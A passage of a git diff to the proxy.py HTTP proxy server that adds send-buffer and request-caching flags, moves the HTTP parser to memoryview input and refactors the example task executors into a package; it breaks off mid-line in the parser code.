diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 21b2f9943f..7b7eb48b51 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -125,8 +125,12 @@ repos: rev: v2.1.0 hooks: - id: codespell - exclude: >- - ^.+\.min\.js$ + exclude: > + (?x)^( + ^.+\.ipynb$| + tests/http/test_responses\.py| + ^.+\.min\.js$ + )$ - repo: https://github.com/adrienverge/yamllint.git rev: v1.26.2 diff --git a/Makefile b/Makefile index 51f12a4412..1a88722121 100644 --- a/Makefile +++ b/Makefile @@ -94,7 +94,7 @@ lib-clean: rm -rf .hypothesis # Doc RST files are cached and can cause issues # See https://github.com/abhinavsingh/proxy.py/issues/642#issuecomment-1003444578 - rm docs/pkg/*.rst + rm -f docs/pkg/*.rst lib-dep: pip install --upgrade pip && \ @@ -134,7 +134,7 @@ lib-doc: python -m tox -e build-docs && \ $(OPEN) .tox/build-docs/docs_out/index.html || true -lib-coverage: +lib-coverage: lib-clean pytest --cov=proxy --cov=tests --cov-report=html tests/ && \ $(OPEN) htmlcov/index.html || true diff --git a/README.md b/README.md index 273bb02418..e38d107c43 100644 --- a/README.md +++ b/README.md @@ -250,7 +250,7 @@ - See `--enable-static-server` and `--static-server-dir` flags - Optimized for large file uploads and downloads - - See `--client-recvbuf-size` and `--server-recvbuf-size` flag + - See `--client-recvbuf-size`, `--server-recvbuf-size`, `--max-sendbuf-size` flags - `IPv4` and `IPv6` support - See `--hostname` flag @@ -710,6 +710,8 @@ Start `proxy.py` as: --plugins proxy.plugin.CacheResponsesPlugin ``` +You may also use the `--cache-requests` flag to enable request packet caching for inspection. + Verify using `curl -v -x localhost:8899 http://httpbin.org/get`: ```console @@ -2278,13 +2280,14 @@ usage: -m [-h] [--tunnel-hostname TUNNEL_HOSTNAME] [--tunnel-port TUNNEL_PORT] [--work-klass WORK_KLASS] [--pid-file PID_FILE] [--enable-proxy-protocol] [--enable-conn-pool] [--key-file KEY_FILE] [--cert-file CERT_FILE] [--client-recvbuf-size CLIENT_RECVBUF_SIZE] - [--server-recvbuf-size SERVER_RECVBUF_SIZE] [--timeout TIMEOUT] + [--server-recvbuf-size SERVER_RECVBUF_SIZE] + [--max-sendbuf-size MAX_SENDBUF_SIZE] [--timeout TIMEOUT] [--disable-http-proxy] [--disable-headers DISABLE_HEADERS] [--ca-key-file CA_KEY_FILE] [--ca-cert-dir CA_CERT_DIR] [--ca-cert-file CA_CERT_FILE] [--ca-file CA_FILE] [--ca-signing-key-file CA_SIGNING_KEY_FILE] [--auth-plugin AUTH_PLUGIN] [--cache-dir CACHE_DIR] - [--proxy-pool PROXY_POOL] [--enable-web-server] + [--cache-requests] [--proxy-pool PROXY_POOL] [--enable-web-server] [--enable-static-server] [--static-server-dir STATIC_SERVER_DIR] [--min-compression-length MIN_COMPRESSION_LENGTH] [--enable-reverse-proxy] [--pac-file PAC_FILE] @@ -2294,7 +2297,7 @@ usage: -m [-h] [--tunnel-hostname TUNNEL_HOSTNAME] [--tunnel-port TUNNEL_PORT] [--filtered-client-ips FILTERED_CLIENT_IPS] [--filtered-url-regex-config FILTERED_URL_REGEX_CONFIG] -proxy.py v2.4.0rc8.dev17+g59a4335.d20220123 +proxy.py v2.4.0rc9.dev8+gea0253d.d20220126 options: -h, --help show this help message and exit @@ -2389,6 +2392,9 @@ options: --server-recvbuf-size SERVER_RECVBUF_SIZE Default: 128 KB. Maximum amount of data received from the server in a single recv() operation. + --max-sendbuf-size MAX_SENDBUF_SIZE + Default: 64 KB. Maximum amount of data to dispatch in + a single send() operation. --timeout TIMEOUT Default: 10.0. Number of seconds after which an inactive connection must be dropped. Inactivity is defined by no data sent or received by the client. @@ -2425,6 +2431,7 @@ options: Default: /Users/abhinavsingh/.proxy/cache. Flag only applicable when cache plugin is used with on-disk storage. + --cache-requests Default: False. Whether to also cache request packets. --proxy-pool PROXY_POOL List of upstream proxies to use in the pool --enable-web-server Default: False. Whether to enable diff --git a/examples/task.py b/examples/task.py index 67441d8239..9157225583 100644 --- a/examples/task.py +++ b/examples/task.py @@ -8,116 +8,64 @@ :copyright: (c) 2013-present by Abhinav Singh and contributors. :license: BSD, see LICENSE for more details. """ -import time +import sys import argparse -import threading -import multiprocessing -from typing import Any -from proxy.core.work import ( - Work, ThreadlessPool, BaseLocalExecutor, BaseRemoteExecutor, -) +from proxy.core.work import ThreadlessPool from proxy.common.flag import FlagParser -from proxy.common.backports import NonBlockingQueue - - -class Task: - """This will be our work object.""" - - def __init__(self, payload: bytes) -> None: - self.payload = payload - print(payload) - - -class TaskWork(Work[Task]): - """This will be our handler class, created for each received work.""" - - @staticmethod - def create(*args: Any) -> Task: - """Work core doesn't know how to create work objects for us, so - we must provide an implementation of create method here.""" - return Task(*args) - - -class LocalTaskExecutor(BaseLocalExecutor): - """We'll define a local executor which is capable of receiving - log lines over a non blocking queue.""" - - def work(self, *args: Any) -> None: - task_id = int(time.time()) - uid = '%s-%s' % (self.iid, task_id) - self.works[task_id] = self.create(uid, *args) - - -class RemoteTaskExecutor(BaseRemoteExecutor): - - def work(self, *args: Any) -> None: - task_id = int(time.time()) - uid = '%s-%s' % (self.iid, task_id) - self.works[task_id] = self.create(uid, *args) - - -def start_local(flags: argparse.Namespace) -> None: - work_queue = NonBlockingQueue() - executor = LocalTaskExecutor(iid=1, work_queue=work_queue, flags=flags) +from proxy.core.work.task import ( + RemoteTaskExecutor, ThreadedTaskExecutor, SingleProcessTaskExecutor, +) - t = threading.Thread(target=executor.run) - t.daemon = True - t.start() - try: +def start_local_thread(flags: argparse.Namespace) -> None: + with ThreadedTaskExecutor(flags=flags) as thread: i = 0 while True: - work_queue.put(('%d' % i).encode('utf-8')) + thread.executor.work_queue.put(('%d' % i).encode('utf-8')) i += 1 - except KeyboardInterrupt: - pass - finally: - executor.running.set() - t.join() -def start_remote(flags: argparse.Namespace) -> None: - pipe = multiprocessing.Pipe() - work_queue = pipe[0] - executor = RemoteTaskExecutor(iid=1, work_queue=pipe[1], flags=flags) +def start_remote_process(flags: argparse.Namespace) -> None: + with SingleProcessTaskExecutor(flags=flags) as process: + i = 0 + while True: + process.work_queue.send(('%d' % i).encode('utf-8')) + i += 1 - p = multiprocessing.Process(target=executor.run) - p.daemon = True - p.start() - try: +def start_remote_pool(flags: argparse.Namespace) -> None: + with ThreadlessPool(flags=flags, executor_klass=RemoteTaskExecutor) as pool: i = 0 while True: + work_queue = pool.work_queues[i % flags.num_workers] work_queue.send(('%d' % i).encode('utf-8')) i += 1 - except KeyboardInterrupt: - pass - finally: - executor.running.set() - p.join() -def start_remote_pool(flags: argparse.Namespace) -> None: - with ThreadlessPool(flags=flags, executor_klass=RemoteTaskExecutor) as pool: - try: - i = 0 - while True: - work_queue = pool.work_queues[i % flags.num_workers] - work_queue.send(('%d' % i).encode('utf-8')) - i += 1 - except KeyboardInterrupt: - pass +def main() -> None: + try: + flags = FlagParser.initialize( + sys.argv[2:] + ['--disable-http-proxy'], + work_klass='proxy.core.work.task.TaskHandler', + ) + globals()['start_%s' % sys.argv[1]](flags) + except KeyboardInterrupt: + pass # TODO: TaskWork, LocalTaskExecutor, RemoteTaskExecutor # should not be needed, abstract those pieces out in the core # for stateless tasks. if __name__ == '__main__': - flags = FlagParser.initialize( - ['--disable-http-proxy'], - work_klass=TaskWork, - ) - start_remote_pool(flags) - # start_remote(flags) - # start_local(flags) + if len(sys.argv) < 2: + print( + '\n'.join([ + 'Usage:', + ' %s ' % sys.argv[0], + ' execution-mode can be one of the following:', + ' "remote_pool", "remote_process", "local_thread"', + ]), + ) + sys.exit(1) + main() diff --git a/proxy/common/constants.py b/proxy/common/constants.py index 3ec1acb758..90d7243624 100644 --- a/proxy/common/constants.py +++ b/proxy/common/constants.py @@ -74,6 +74,7 @@ def _env_threadless_compliant() -> bool: # Defaults DEFAULT_BACKLOG = 100 DEFAULT_BASIC_AUTH = None +DEFAULT_MAX_SEND_SIZE = 64 * 1024 DEFAULT_BUFFER_SIZE = 128 * 1024 DEFAULT_CA_CERT_DIR = None DEFAULT_CA_CERT_FILE = None @@ -124,14 +125,13 @@ def _env_threadless_compliant() -> bool: DEFAULT_PORT = 8899 DEFAULT_SERVER_RECVBUF_SIZE = DEFAULT_BUFFER_SIZE DEFAULT_STATIC_SERVER_DIR = os.path.join(PROXY_PY_DIR, "public") -DEFAULT_MIN_COMPRESSION_LIMIT = 20 # In bytes +DEFAULT_MIN_COMPRESSION_LENGTH = 20 # In bytes DEFAULT_THREADLESS = _env_threadless_compliant() DEFAULT_LOCAL_EXECUTOR = True DEFAULT_TIMEOUT = 10.0 DEFAULT_VERSION = False DEFAULT_HTTP_PORT = 80 DEFAULT_HTTPS_PORT = 443 -DEFAULT_MAX_SEND_SIZE = 16 * 1024 DEFAULT_WORK_KLASS = 'proxy.http.HttpProtocolHandler' DEFAULT_ENABLE_PROXY_PROTOCOL = False # 25 milliseconds to keep the loops hot @@ -148,6 +148,7 @@ def _env_threadless_compliant() -> bool: DEFAULT_CACHE_DIRECTORY_PATH = os.path.join( DEFAULT_DATA_DIRECTORY_PATH, 'cache', ) +DEFAULT_CACHE_REQUESTS = False # Cor plugins enabled by default or via flags DEFAULT_ABC_PLUGINS = [ diff --git a/proxy/common/flag.py b/proxy/common/flag.py index 35849d2dc6..f74acc0ddd 100644 --- a/proxy/common/flag.py +++ b/proxy/common/flag.py @@ -30,7 +30,7 @@ PLUGIN_REVERSE_PROXY, DEFAULT_NUM_ACCEPTORS, PLUGIN_INSPECT_TRAFFIC, DEFAULT_DISABLE_HEADERS, PY2_DEPRECATION_MESSAGE, DEFAULT_DEVTOOLS_WS_PATH, PLUGIN_DEVTOOLS_PROTOCOL, PLUGIN_WEBSOCKET_TRANSPORT, - DEFAULT_DATA_DIRECTORY_PATH, DEFAULT_MIN_COMPRESSION_LIMIT, + DEFAULT_DATA_DIRECTORY_PATH, DEFAULT_MIN_COMPRESSION_LENGTH, ) @@ -335,13 +335,13 @@ def initialize( args.static_server_dir, ), ) - args.min_compression_limit = cast( + args.min_compression_length = cast( bool, opts.get( - 'min_compression_limit', + 'min_compression_length', getattr( - args, 'min_compression_limit', - DEFAULT_MIN_COMPRESSION_LIMIT, + args, 'min_compression_length', + DEFAULT_MIN_COMPRESSION_LENGTH, ), ), ) diff --git a/proxy/common/utils.py b/proxy/common/utils.py index 324dc16575..d157775d7f 100644 --- a/proxy/common/utils.py +++ b/proxy/common/utils.py @@ -26,7 +26,7 @@ from .types import HostPort from .constants import ( CRLF, COLON, HTTP_1_1, IS_WINDOWS, WHITESPACE, DEFAULT_TIMEOUT, - DEFAULT_THREADLESS, + DEFAULT_THREADLESS, PROXY_AGENT_HEADER_VALUE, ) @@ -84,14 +84,30 @@ def bytes_(s: Any, encoding: str = 'utf-8', errors: str = 'strict') -> Any: def build_http_request( method: bytes, url: bytes, protocol_version: bytes = HTTP_1_1, + content_type: Optional[bytes] = None, headers: Optional[Dict[bytes, bytes]] = None, body: Optional[bytes] = None, conn_close: bool = False, + no_ua: bool = False, ) -> bytes: """Build and returns a HTTP request packet.""" + headers = headers or {} + if content_type is not None: + headers[b'Content-Type'] = content_type + has_transfer_encoding = False + has_user_agent = False + for k, _ in headers.items(): + if k.lower() == b'transfer-encoding': + has_transfer_encoding = True + elif k.lower() == b'user-agent': + has_user_agent = True + if body and not has_transfer_encoding: + headers[b'Content-Length'] = bytes_(len(body)) + if not has_user_agent and not no_ua: + headers[b'User-Agent'] = PROXY_AGENT_HEADER_VALUE return build_http_pkt( [method, url, protocol_version], - headers or {}, + headers, body, conn_close, ) @@ -109,19 +125,14 @@ def build_http_response( line = [protocol_version, bytes_(status_code)] if reason: line.append(reason) - if headers is None: - headers = {} - has_content_length = False + headers = headers or {} has_transfer_encoding = False for k, _ in headers.items(): - if k.lower() == b'content-length': - has_content_length = True if k.lower() == b'transfer-encoding': has_transfer_encoding = True - if body is not None and \ - not has_transfer_encoding and \ - not has_content_length: - headers[b'Content-Length'] = bytes_(len(body)) + break + if not has_transfer_encoding: + headers[b'Content-Length'] = bytes_(len(body)) if body else b'0' return build_http_pkt(line, headers, body, conn_close) diff --git a/proxy/core/acceptor/acceptor.py b/proxy/core/acceptor/acceptor.py index 0df4c2a555..299c0efbd0 100644 --- a/proxy/core/acceptor/acceptor.py +++ b/proxy/core/acceptor/acceptor.py @@ -178,6 +178,7 @@ def run(self) -> None: for fileno in self.socks: self.socks[fileno].close() self.socks.clear() + self.selector.close() logger.debug('Acceptor#%d shutdown', self.idd) def _recv_and_setup_socks(self) -> None: @@ -207,7 +208,8 @@ def _start_local(self) -> None: self._lthread.start() def _stop_local(self) -> None: - if self._lthread is not None and self._local_work_queue is not None: + if self._lthread is not None and \ + self._local_work_queue is not None: self._local_work_queue.put(False) self._lthread.join() diff --git a/proxy/core/base/tcp_server.py b/proxy/core/base/tcp_server.py index dfc368f461..8d9b5cf74c 100644 --- a/proxy/core/base/tcp_server.py +++ b/proxy/core/base/tcp_server.py @@ -27,7 +27,8 @@ from ...core.connection import TcpClientConnection from ...common.constants import ( DEFAULT_TIMEOUT, DEFAULT_KEY_FILE, DEFAULT_CERT_FILE, - DEFAULT_CLIENT_RECVBUF_SIZE, DEFAULT_SERVER_RECVBUF_SIZE, + DEFAULT_MAX_SEND_SIZE, DEFAULT_CLIENT_RECVBUF_SIZE, + DEFAULT_SERVER_RECVBUF_SIZE, ) @@ -68,6 +69,14 @@ 'server in a single recv() operation.', ) +flags.add_argument( + '--max-sendbuf-size', + type=int, + default=DEFAULT_MAX_SEND_SIZE, + help='Default: ' + str(int(DEFAULT_MAX_SEND_SIZE / 1024)) + + ' KB. Maximum amount of data to dispatch in a single send() operation.', +) + flags.add_argument( '--timeout', type=int, @@ -164,7 +173,7 @@ async def handle_writables(self, writables: Writables) -> bool: logger.debug( 'Flushing buffer to client {0}'.format(self.work.address), ) - self.work.flush() + self.work.flush(self.flags.max_sendbuf_size) if self.must_flush_before_shutdown is True and \ not self.work.has_buffer(): teardown = True diff --git a/proxy/core/base/tcp_tunnel.py b/proxy/core/base/tcp_tunnel.py index fedeac2190..7b28fbec7d 100644 --- a/proxy/core/base/tcp_tunnel.py +++ b/proxy/core/base/tcp_tunnel.py @@ -89,7 +89,7 @@ async def handle_events( return do_shutdown # Handle server events if self.upstream and self.upstream.connection.fileno() in readables: - data = self.upstream.recv() + data = self.upstream.recv(self.flags.server_recvbuf_size) if data is None: # Server closed connection logger.debug('Connection closed by server') @@ -97,7 +97,7 @@ async def handle_events( # tunnel data to client self.work.queue(data) if self.upstream and self.upstream.connection.fileno() in writables: - self.upstream.flush() + self.upstream.flush(self.flags.max_sendbuf_size) return False def connect_upstream(self) -> None: diff --git a/proxy/core/base/tcp_upstream.py b/proxy/core/base/tcp_upstream.py index f045f1f9fe..31a0657201 100644 --- a/proxy/core/base/tcp_upstream.py +++ b/proxy/core/base/tcp_upstream.py @@ -75,19 +75,18 @@ async def read_from_descriptors(self, r: Readables) -> bool: self.upstream.connection.fileno() in r: try: raw = self.upstream.recv(self.server_recvbuf_size) - if raw is not None: - self.total_size += len(raw) - self.handle_upstream_data(raw) - else: + if raw is None: # pragma: no cover # Tear down because upstream proxy closed the connection return True - except TimeoutError: + self.total_size += len(raw) + self.handle_upstream_data(raw) + except TimeoutError: # pragma: no cover logger.info('Upstream recv timeout error') return True - except ssl.SSLWantReadError: + except ssl.SSLWantReadError: # pragma: no cover logger.info('Upstream SSLWantReadError, will retry') return False - except ConnectionResetError: + except ConnectionResetError: # pragma: no cover logger.debug('Connection reset by upstream') return True return False @@ -97,11 +96,12 @@ async def write_to_descriptors(self, w: Writables) -> bool: self.upstream.connection.fileno() in w and \ self.upstream.has_buffer(): try: + # TODO: max sendbuf size flag currently not used here self.upstream.flush() - except ssl.SSLWantWriteError: + except ssl.SSLWantWriteError: # pragma: no cover logger.info('Upstream SSLWantWriteError, will retry') return False - except BrokenPipeError: + except BrokenPipeError: # pragma: no cover logger.debug('BrokenPipeError when flushing to upstream') return True return False diff --git a/proxy/core/connection/connection.py b/proxy/core/connection/connection.py index cddf585a11..a8c090d137 100644 --- a/proxy/core/connection/connection.py +++ b/proxy/core/connection/connection.py @@ -10,7 +10,7 @@ """ import logging from abc import ABC, abstractmethod -from typing import List, Optional +from typing import List, Union, Optional from .types import tcpConnectionTypes from ...common.types import TcpOrTlsSocket @@ -47,7 +47,7 @@ def connection(self) -> TcpOrTlsSocket: """Must return the socket connection to use in this class.""" raise TcpConnectionUninitializedException() # pragma: no cover - def send(self, data: bytes) -> int: + def send(self, data: Union[memoryview, bytes]) -> int: """Users must handle BrokenPipeError exceptions""" # logger.info(data) return self.connection.send(data) @@ -79,17 +79,20 @@ def queue(self, mv: memoryview) -> None: self.buffer.append(mv) self._num_buffer += 1 - def flush(self) -> int: + def flush(self, max_send_size: Optional[int] = None) -> int: """Users must handle BrokenPipeError exceptions""" if not self.has_buffer(): return 0 - mv = self.buffer[0].tobytes() - sent: int = self.send(mv[:DEFAULT_MAX_SEND_SIZE]) + mv = self.buffer[0] + # TODO: Assemble multiple packets if total + # size remains below max send size. + max_send_size = max_send_size or DEFAULT_MAX_SEND_SIZE + sent: int = self.send(mv[:max_send_size]) if sent == len(mv): self.buffer.pop(0) self._num_buffer -= 1 else: - self.buffer[0] = memoryview(mv[sent:]) + self.buffer[0] = mv[sent:] del mv logger.debug('flushed %d bytes to %s' % (sent, self.tag)) return sent diff --git a/proxy/core/connection/server.py b/proxy/core/connection/server.py index 83ad0ae557..d8e8ecfb69 100644 --- a/proxy/core/connection/server.py +++ b/proxy/core/connection/server.py @@ -43,7 +43,12 @@ def connect( ) self.closed = False - def wrap(self, hostname: str, ca_file: Optional[str] = None) -> None: + def wrap( + self, + hostname: str, + ca_file: Optional[str] = None, + as_non_blocking: bool = False, + ) -> None: ctx = ssl.create_default_context( ssl.Purpose.SERVER_AUTH, cafile=ca_file, ) @@ -54,4 +59,5 @@ def wrap(self, hostname: str, ca_file: Optional[str] = None) -> None: self.connection, server_hostname=hostname, ) - self.connection.setblocking(False) + if as_non_blocking: + self.connection.setblocking(False) diff --git a/proxy/core/work/task/__init__.py b/proxy/core/work/task/__init__.py new file mode 100644 index 0000000000..157ae566d9 --- /dev/null +++ b/proxy/core/work/task/__init__.py @@ -0,0 +1,24 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. +""" +from .task import Task +from .local import LocalTaskExecutor, ThreadedTaskExecutor +from .remote import RemoteTaskExecutor, SingleProcessTaskExecutor +from .handler import TaskHandler + + +__all__ = [ + 'Task', + 'TaskHandler', + 'LocalTaskExecutor', + 'ThreadedTaskExecutor', + 'RemoteTaskExecutor', + 'SingleProcessTaskExecutor', +] diff --git a/proxy/core/work/task/handler.py b/proxy/core/work/task/handler.py new file mode 100644 index 0000000000..5fd78e3833 --- /dev/null +++ b/proxy/core/work/task/handler.py @@ -0,0 +1,25 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. +""" +from typing import Any + +from .task import Task +from ..work import Work + + +class TaskHandler(Work[Task]): + """Task handler.""" + + @staticmethod + def create(*args: Any) -> Task: + """Work core doesn't know how to create work objects for us. + Example, for task module scenario, it doesn't know how to create + Task objects for us.""" + return Task(*args) diff --git a/proxy/core/work/task/local.py b/proxy/core/work/task/local.py new file mode 100644 index 0000000000..a2642b23fa --- /dev/null +++ b/proxy/core/work/task/local.py @@ -0,0 +1,50 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. +""" +import time +import uuid +import threading +from typing import Any + +from ..local import BaseLocalExecutor +from ....common.backports import NonBlockingQueue + + +class LocalTaskExecutor(BaseLocalExecutor): + """We'll define a local executor which is capable of receiving + log lines over a non blocking queue.""" + + def work(self, *args: Any) -> None: + task_id = int(time.time()) + uid = '%s-%s' % (self.iid, task_id) + self.works[task_id] = self.create(uid, *args) + + +class ThreadedTaskExecutor(threading.Thread): + + def __init__(self, **kwargs: Any) -> None: + super().__init__() + self.daemon = True + self.executor = LocalTaskExecutor( + iid=uuid.uuid4().hex, + work_queue=NonBlockingQueue(), + **kwargs, + ) + + def __enter__(self) -> 'ThreadedTaskExecutor': + self.start() + return self + + def __exit__(self, *args: Any) -> None: + self.executor.running.set() + self.join() + + def run(self) -> None: + self.executor.run() diff --git a/proxy/core/work/task/remote.py b/proxy/core/work/task/remote.py new file mode 100644 index 0000000000..ce4b0009df --- /dev/null +++ b/proxy/core/work/task/remote.py @@ -0,0 +1,48 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. +""" +import time +import uuid +import multiprocessing +from typing import Any + +from ..remote import BaseRemoteExecutor + + +class RemoteTaskExecutor(BaseRemoteExecutor): + + def work(self, *args: Any) -> None: + task_id = int(time.time()) + uid = '%s-%s' % (self.iid, task_id) + self.works[task_id] = self.create(uid, *args) + + +class SingleProcessTaskExecutor(multiprocessing.Process): + + def __init__(self, **kwargs: Any) -> None: + super().__init__() + self.daemon = True + self.work_queue, remote = multiprocessing.Pipe() + self.executor = RemoteTaskExecutor( + iid=uuid.uuid4().hex, + work_queue=remote, + **kwargs, + ) + + def __enter__(self) -> 'SingleProcessTaskExecutor': + self.start() + return self + + def __exit__(self, *args: Any) -> None: + self.executor.running.set() + self.join() + + def run(self) -> None: + self.executor.run() diff --git a/proxy/core/work/task/task.py b/proxy/core/work/task/task.py new file mode 100644 index 0000000000..f4467ef2c8 --- /dev/null +++ b/proxy/core/work/task/task.py @@ -0,0 +1,18 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. +""" + + +class Task: + """Task object which known how to process the payload.""" + + def __init__(self, payload: bytes) -> None: + self.payload = payload + print(payload) diff --git a/proxy/core/work/threadless.py b/proxy/core/work/threadless.py index 1ad84ac645..f43c0a4732 100644 --- a/proxy/core/work/threadless.py +++ b/proxy/core/work/threadless.py @@ -419,6 +419,7 @@ def run(self) -> None: if wqfileno is not None: self.selector.unregister(wqfileno) self.close_work_queue() + self.selector.close() assert self.loop is not None self.loop.run_until_complete(self.loop.shutdown_asyncgens()) self.loop.close() diff --git a/proxy/dashboard/dashboard.py b/proxy/dashboard/dashboard.py index 411c153b60..b5548ea524 100644 --- a/proxy/dashboard/dashboard.py +++ b/proxy/dashboard/dashboard.py @@ -13,9 +13,7 @@ from typing import List, Tuple from ..http.parser import HttpParser -from ..http.server import ( - HttpWebServerPlugin, HttpWebServerBasePlugin, httpProtocolTypes, -) +from ..http.server import HttpWebServerBasePlugin, httpProtocolTypes from ..http.responses import permanentRedirectResponse @@ -46,11 +44,12 @@ def routes(self) -> List[Tuple[int, str]]: def handle_request(self, request: HttpParser) -> None: if request.path == b'/dashboard/': self.client.queue( - HttpWebServerPlugin.read_and_build_static_file_response( + self.serve_static_file( os.path.join( self.flags.static_server_dir, 'dashboard', 'proxy.html', ), + self.flags.min_compression_length, ), ) elif request.path in ( diff --git a/proxy/http/handler.py b/proxy/http/handler.py index dc2d7cfbf1..c8d070411c 100644 --- a/proxy/http/handler.py +++ b/proxy/http/handler.py @@ -163,9 +163,7 @@ def handle_data(self, data: memoryview) -> Optional[bool]: self.work.closed = True return True try: - # Don't parse incoming data any further after 1st request has completed. - # - # This specially does happen for pipeline requests. + # We don't parse incoming data any further after 1st HTTP request packet. # # Plugins can utilize on_client_data for such cases and # apply custom logic to handle request data sent after 1st @@ -173,11 +171,10 @@ def handle_data(self, data: memoryview) -> Optional[bool]: if self.request.state != httpParserStates.COMPLETE: if self._parse_first_request(data): return True - else: - # HttpProtocolHandlerPlugin.on_client_data - # Can raise HttpProtocolException to tear down the connection - if self.plugin: - data = self.plugin.on_client_data(data) or data + # HttpProtocolHandlerPlugin.on_client_data + # Can raise HttpProtocolException to tear down the connection + elif self.plugin: + self.plugin.on_client_data(data) except HttpProtocolException as e: logger.info('HttpProtocolException: %s' % e) response: Optional[memoryview] = e.response(self.request) @@ -270,11 +267,8 @@ def _discover_plugin_klass(self, protocol: int) -> Optional[Type['HttpProtocolHa def _parse_first_request(self, data: memoryview) -> bool: # Parse http request - # - # TODO(abhinavsingh): Remove .tobytes after parser is - # memoryview compliant try: - self.request.parse(data.tobytes()) + self.request.parse(data) except HttpProtocolException as e: # noqa: WPS329 self.work.queue(BAD_REQUEST_RESPONSE_PKT) raise e @@ -351,6 +345,8 @@ def run(self) -> None: ) finally: self.shutdown() + if self.selector: + self.selector.close() loop.close() async def _run_once(self) -> bool: @@ -397,7 +393,7 @@ def _flush(self) -> None: ] = self.selector.select(timeout=DEFAULT_SELECTOR_SELECT_TIMEOUT) if len(ev) == 0: continue - self.work.flush() + self.work.flush(self.flags.max_sendbuf_size) except BrokenPipeError: pass finally: diff --git a/proxy/http/parser/chunk.py b/proxy/http/parser/chunk.py index 691117926d..eb35798955 100644 --- a/proxy/http/parser/chunk.py +++ b/proxy/http/parser/chunk.py @@ -34,13 +34,13 @@ def __init__(self) -> None: # Expected size of next following chunk self.size: Optional[int] = None - def parse(self, raw: bytes) -> bytes: + def parse(self, raw: memoryview) -> memoryview: more = len(raw) > 0 while more and self.state != chunkParserStates.COMPLETE: - more, raw = self.process(raw) + more, raw = self.process(raw.tobytes()) return raw - def process(self, raw: bytes) -> Tuple[bool, bytes]: + def process(self, raw: bytes) -> Tuple[bool, memoryview]: if self.state == chunkParserStates.WAITING_FOR_SIZE: # Consume prior chunk in buffer # in case chunk size without CRLF was received @@ -69,7 +69,7 @@ def process(self, raw: bytes) -> Tuple[bool, bytes]: self.state = chunkParserStates.WAITING_FOR_SIZE self.chunk = b'' self.size = None - return len(raw) > 0, raw + return len(raw) > 0, memoryview(raw) @staticmethod def to_chunks(raw: bytes, chunk_size: int = DEFAULT_BUFFER_SIZE) -> bytes: diff --git a/proxy/http/parser/parser.py b/proxy/http/parser/parser.py index 6573cabaf6..4877667229 100644 --- a/proxy/http/parser/parser.py +++ b/proxy/http/parser/parser.py @@ -77,7 +77,7 @@ def __init__( # Total size of raw bytes passed for parsing self.total_size: int = 0 # Buffer to hold unprocessed bytes - self.buffer: bytes = b'' + self.buffer: Optional[memoryview] = None # Internal headers data structure: # - Keys are lower case header names. # - Values are 2-tuple containing original @@ -102,19 +102,19 @@ def request( httpParserTypes.REQUEST_PARSER, enable_proxy_protocol=enable_proxy_protocol, ) - parser.parse(raw) + parser.parse(memoryview(raw)) return parser @classmethod def response(cls: Type[T], raw: bytes) -> T: parser = cls(httpParserTypes.RESPONSE_PARSER) - parser.parse(raw) + parser.parse(memoryview(raw)) return parser def header(self, key: bytes) -> bytes: """Convenient method to return original header value from internal data structure.""" if self.headers is None or key.lower() not in self.headers: - raise KeyError('%s not found in headers', text_(key)) + raise KeyError('%s not found in headers' % text_(key)) return self.headers[key.lower()][1] def has_header(self, key: bytes) -> bool: @@ -206,14 +206,21 @@ def body_expected(self) -> bool: """Returns true if content or chunked response is expected.""" return self._content_expected or self._is_chunked_encoded - def parse(self, raw: bytes, allowed_url_schemes: Optional[List[bytes]] = None) -> None: + def parse( + self, + raw: memoryview, + allowed_url_schemes: Optional[List[bytes]] = None, + ) -> None: """Parses HTTP request out of raw bytes. Check for `HttpParser.state` after `parse` has successfully returned.""" size = len(raw) self.total_size += size - raw = self.buffer + raw - self.buffer, more = b'', size > 0 + if self.buffer: + # TODO(abhinavsingh): Instead of tobytes our parser + # must be capable of working with arrays of memoryview + raw = memoryview(self.buffer.tobytes() + raw.tobytes()) + self.buffer, more = None, size > 0 while more and self.state != httpParserStates.COMPLETE: # gte with HEADERS_COMPLETE also encapsulated RCVING_BODY state if self.state >= httpParserStates.HEADERS_COMPLETE: @@ -237,7 +244,7 @@ def parse(self, raw: bytes, allowed_url_schemes: Optional[List[bytes]] = None) - not (self._content_expected or self._is_chunked_encoded) and \ raw == b'': self.state = httpParserStates.COMPLETE - self.buffer = raw + self.buffer = None if raw == b'' else raw def build(self, disable_headers: Optional[List[bytes]] = None, for_proxy: bool = False) -> bytes: """Rebuild the request object.""" @@ -263,6 +270,7 @@ def build(self, disable_headers: Optional[List[bytes]] = None, for_proxy: bool = k.lower() not in disable_headers }, body=body, + no_ua=True, ) def build_response(self) -> bytes: @@ -278,7 +286,7 @@ def build_response(self) -> bytes: body=self._get_body_or_chunks(), ) - def _process_body(self, raw: bytes) -> Tuple[bool, bytes]: + def _process_body(self, raw: memoryview) -> Tuple[bool, memoryview]: # Ref: http://www.ietf.org/rfc/rfc2616.txt # 3.If a Content-Length header field (section 14.13) is present, its # decimal value in OCTETs represents both the entity-length and the @@ -297,7 +305,8 @@ def _process_body(self, raw: bytes) -> Tuple[bool, 